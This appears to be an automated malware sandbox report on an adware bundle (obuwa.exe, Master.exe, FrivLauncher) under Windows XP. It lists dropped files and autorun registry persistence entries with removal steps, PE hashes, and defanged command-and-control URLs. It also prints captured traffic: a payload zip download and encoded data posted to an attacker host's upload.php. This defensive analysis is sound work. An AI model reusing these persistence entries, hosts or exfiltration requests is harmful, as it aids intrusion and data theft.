%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (7 bytes)
%System%\SET3A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (49 bytes)
%System%\winrm\0409\SET52.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (1281 bytes)
%WinDir%\Help\SETE0.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (16 bytes)
%WinDir%\SECF3.tmp (1897 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (601 bytes)
%System%\SET44.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (5 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (5 bytes)
%WinDir%\inf\SET34.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (6 bytes)
%System%\wbem\SET1F.tmp (4 bytes)
%System%\SET49.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (2 bytes)
%System%\SET25.tmp (7433 bytes)
%System%\SET20.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (5 bytes)
%System%\SET2A.tmp (1281 bytes)
%WinDir%\inf\oem10.PNF (12902 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (40 bytes)
%System%\SET2D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (18 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (7 bytes)
%System%\SET22.tmp (35 bytes)
%System%\SET3D.tmp (1281 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (20 bytes)
%System%\SET29.tmp (22 bytes)
%System%\SET2B.tmp (2 bytes)
%System%\SET41.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (4185 bytes)
%System%\SET2E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (6 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (1 bytes)
%System%\SET45.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (12 bytes)
%System%\SETDA.tmp (42 bytes)
%System%\SET4C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (8 bytes)
%System%\SET4A.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (17 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (40 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (9 bytes)
%System%\SET27.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (3 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\wbem\SET39.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (57 bytes)
%System%\SET42.tmp (601 bytes)
%System%\SET3E.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (1 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SET43.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (8 bytes)
%System%\SET26.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (2 bytes)
%System%\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (2 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (4 bytes)
%System%\SET3C.tmp (35 bytes)
%System%\SET32.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (11 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\SET46.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (601 bytes)
%System%\CatRoot2\dberr.txt (1037 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (2 bytes)
%WinDir%\iis6.log (136883 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (15 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (7 bytes)
%System%\SET48.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (673 bytes)
%WinDir%\inf\SET4D.tmp (38 bytes)
%System%\SET28.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (15 bytes)
%System%\SET31.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (12 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (27 bytes)
%System%\SET3F.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (2 bytes)
%System%\SET2C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (21 bytes)
%WinDir%\KB968930.log (245685 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\SET3B.tmp (2 bytes)
%System%\SET4B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (601 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (19 bytes)
%System%\SET24.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (673 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (10 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (10 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (2 bytes)
%System%\SET40.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (7 bytes)
%WinDir%\ocgen.log (71000 bytes)
%WinDir%\inf\SET4E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\SET2F.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (1281 bytes)
%System%\SET47.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (24 bytes)
%System%\winrm\0409\SET38.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (12 bytes)
%System%\SET30.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (22 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (6 bytes)
%System%\SET23.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (13 bytes)
%WinDir%\inf\SET33.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (9 bytes)
%WinDir%\assembly\tmp\PADGJMQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\tmp\4ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\I147AEHK\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\5NRUX036\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\UEILORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\CWZ258BE\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\6QTWZ258\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\8RUX0369\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\M69DGJMP\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\1KNQUX03\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\VFILORUX\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\BVZ258BF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\PADGJMPT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\EVZ258BE\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\5PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\UEHKNQTW\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\AUX0369D\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\3MQTWZ36\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\H147BEHK\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)
%WinDir%\Temp\RES14.tmp (2892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)
%WinDir%\setupapi.log (4240 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
%Program Files%\FrivLauncher\uninst.exe (8693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
%Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
%WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
%Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 29324 | 29696 | 4.50526 | 419d4e1be1ac35a5db9c47f553b27cea |
.rdata | 36864 | 11118 | 11264 | 3.11773 | cca1ca3fbf99570f6de9b43ce767f368 |
.data | 49152 | 469916 | 512 | 1.25109 | 77f0839f8ebea31040e462523e1c770e |
.ndata | 520192 | 741376 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 1261568 | 17024 | 17408 | 1.69016 | 0bbd2f1bc316f3c3d0ace6d7a5ce946e |
.reloc | 1282048 | 4054 | 4096 | 1.09312 | ef47c39f20b68b98c681fcd9fd4f6838 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 3
4ae1505b614bcc4f36e88f69b9d2269b
115fe4a617dca139d1dad1a3b3e18d65
723e89e2d665897233e1afdfba6c50d4
Network Activity
URLs
URL | IP |
---|---|
hxxp://genisys.online/browser.jsonp | 104.28.26.189 |
hxxp://178.33.69.66/upload.php | |
hxxp://microsoft.com/ | |
hxxp://e10088.dspb.akamaiedge.net/ | |
hxxp://e10088.dspb.akamaiedge.net/uk-ua/ | |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://69.87.192.155/ | |
hxxp://hen2.microaol.net/api | 52.50.127.149 |
hxxp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip | 52.50.127.149 |
hxxp://www.microsoft.com/ | 23.54.1.2 |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 23.37.59.27 |
hxxp://www.microsoft.com/uk-ua/ | 23.54.1.2 |
ssl.google-analytics.com | 216.58.214.200 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip HTTP/1.1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2129486
Content-Type: application/zip
Last-Modified: Fri, 18 Mar 2016 10:30:58 GMT
Date: Wed, 11 May 2016 21:18:09 GMT
<<< skipped >>>
POST hXXp://hen2.microaol.net/api HTTP/1.1
Content-Type: application/json
Content-Length: 198
Yzp7cHl2dn10OiI6fH1qfXtzbWs6NDp9bn12bDoiOmtseWpsOjQ6cXw6Ii80OnR3
e3l0fToiKSgrKzQ6aGp3fG17bDoiOl5qcW5UeW12e3B9ajo0Om1tcXw6IjpjKnos
Kip5ICwhfXp8LCx8KiF eS99LSB9fCl6ICB LX5lOjQ6bn1qa3F3djoiOio2KTpl
HTTP/1.1 200 OK
Content-Length: 39
Content-Type: application/json
Date: Wed, 11 May 2016 21:18:07 GMT
{"rc":0,"st":1463001487,"payroll":null}
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 178.33.69.66
Content-Length: 236
Cache-Control: no-cache
I21F3cM/AoSf lEcGrGqs1 vcKjRRcc2OgPH4txv0YZ 24G2khb6H6/e6RXwLDdAWJ4E /nS Nscth32/vuQGaIVy Hfu9BdZ8m2vBmoGEjUVvXgvjg5vl31Zq3tfdfRb8ia9gjDY9OTotW8gAcWUM9xilQN4ROnLUuC 60MSjISO6iY4JU10NilwsJezJLoKtf5pn8yPFUzsFK 3zbT5yGdeaO0P9mbFBqL1CD9xuz5
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 208
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /upload.php was not found on this server.</p>
</body></html>
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Wed, 11 May 2016 21:17:23 GMT
